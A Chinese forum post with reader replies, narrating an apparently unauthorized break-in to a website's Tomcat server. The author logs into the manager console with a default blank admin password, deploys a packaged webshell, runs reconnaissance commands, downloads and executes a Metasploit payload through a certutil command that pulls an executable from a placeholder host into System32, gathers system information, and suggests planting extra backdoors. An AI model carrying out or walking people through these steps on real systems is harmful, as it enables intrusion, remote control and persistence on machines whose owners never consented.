首页
社区
课程
招聘
[原创]浅析:TomCat Getshell拿服务器权限实战
发表于: 2019-9-29 21:38 1931

[原创]浅析:TomCat Getshell拿服务器权限实战

2019-9-29 21:38
1931

0xOO前言

无意中接触到一个网站 所以索性尝试一下

没什么技术性 都是一些基本操作 大佬看看就可以了奥

注:由于保密问题 所有关于对方信息网址等各项信息都将保密打上马赛克 能打的都打上马赛克


0x00

tomcat默认有个manager的管理后台app,密码存放在conf/tomcat-users.xml里面。如果tomcat是外网开放的,那么这个manager服务也是开放的,http://主机:端口/manager/html 可以看看是不是通的

0x01


首先我尝试一下默认账号admin 密码为空 发现可以进去 那真是太好了


登录进去之后


可以看到有一个上传war部署项目的


那么就用IDEA 打包一个webshell大马 部署进去即可

首先需要一个自备的webshell大马


随便找一个

然后打开IDEA创建一个项目


一直Next即可

然后把webshell拷贝到scr目录


选择Project Structure


选择Artifacts 然后再选择web Application: Archive


打勾include in project build 然后点击+号选择module Output


选择项目即可


然后选择build

选择build Artifacts


完事之后呢

上传部署即可


点击Deploy之后就可以看到

多了一个xssx

那么访问那个目录即可



命令执行 ipconfig

可以看到内网 192.168.0.128

Net user


0x02

权限移交MetaSploit(Msf)

尝试使用shellcode制作payload



编译后利用webshell上传到服务器

有最快捷的方法把payload上传到服务器( 记得一定要内网穿透哦 )

1. 第一种就是使用CMD的命令certutil(然后使用CMD命令运行即可)

命令:certutil -urlcache -split -f https://www.xxx.com/test.EXE

2.第二种就是使用webshell的上传(同理,使用CMD命令运行PAYLOAD)

首先使用webshell来到服务器的C:\\Windows\\System32\\目录下,然后uploadfile


Jie.exe就是我们上传的payload

那么直接使用CMD命令运行(命令:start C:\Windows\System32\jie.exe)



内网的IP为192.168.0.128

0x03

信息收集

1.查看路由


2.查看系统信息


3.进入CMD命令行 然后Net User查看用户


4.调用post/windows/gather/dumplinks 来查看最近访问的文件


5.调用post/windows/gather/enum_applications 来查看目标主机安装软件的信息



然后可以选择多放几个后门 或者 提交漏洞!

请在国庆期间做一个好人



我的网站:CatGames官网 CatGames网盘 CatGames网络验证 CatGamesXss平台


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 3
支持
分享
最新回复 (25)
雪    币: 21449
活跃值: (62273)
能力值: (RANK:125 )
在线值:
发帖
回帖
粉丝
2
感谢分享~前排沙发
2019-9-29 22:15
0
雪    币: 4882
活跃值: (9314)
能力值: ( LV9,RANK:181 )
在线值:
发帖
回帖
粉丝
3
我是来看表情的。
2019-9-30 11:49
0
雪    币: 202
活跃值: (161)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
我是来看表情的。
2019-9-30 12:23
0
雪    币: 452
活跃值: (6128)
能力值: ( LV12,RANK:580 )
在线值:
发帖
回帖
粉丝
5
nevinhappy 我是来看表情的。
好的1
2019-9-30 21:29
0
雪    币: 452
活跃值: (6128)
能力值: ( LV12,RANK:580 )
在线值:
发帖
回帖
粉丝
6
好的1 欢迎
2019-9-30 21:29
0
雪    币: 452
活跃值: (6128)
能力值: ( LV12,RANK:580 )
在线值:
发帖
回帖
粉丝
7
1
2019-10-1 09:43
0
雪    币: 452
活跃值: (6128)
能力值: ( LV12,RANK:580 )
在线值:
发帖
回帖
粉丝
8
1
2019-10-1 09:52
0
雪    币: 452
活跃值: (6128)
能力值: ( LV12,RANK:580 )
在线值:
发帖
回帖
粉丝
9
CCC
2019-10-1 15:36
0
雪    币: 452
活跃值: (6128)
能力值: ( LV12,RANK:580 )
在线值:
发帖
回帖
粉丝
10
1
2019-10-1 20:24
0
雪    币: 310
活跃值: (2227)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
mark
2019-10-1 21:19
0
雪    币: 73
活跃值: (923)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
之前无意间发现一个类似的,不敢测试。楼主别乱搞啊
2019-10-9 18:05
0
雪    币: 219
活跃值: (16)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
13
1
2019-10-11 15:52
0
雪    币:
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
17
哈哈,对新人很有帮助,谢谢你
2019-12-28 09:59
0
雪    币: 310
活跃值: (2227)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
mark
2020-3-17 23:20
0
雪    币:
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
19
表情精彩
2020-3-26 11:47
0
雪    币: 83
活跃值: (1082)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
20
hehe
2020-3-26 15:58
0
雪    币: 36
活跃值: (16)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
21
挺棒的,学到了~
2020-3-27 10:40
0
雪    币: 7917
活跃值: (2281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
23
群被封了,我该何去何从
2020-9-11 10:10
0
雪    币: 452
活跃值: (6128)
能力值: ( LV12,RANK:580 )
在线值:
发帖
回帖
粉丝
24
HucKer 群被封了,我该何去何从
害 那咋办嘛
2020-9-11 13:46
0
雪    币: 141
活跃值: (70)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
25
学到很多,谢谢
2020-9-30 06:59
0
游客
登录 | 注册 方可回帖
返回
//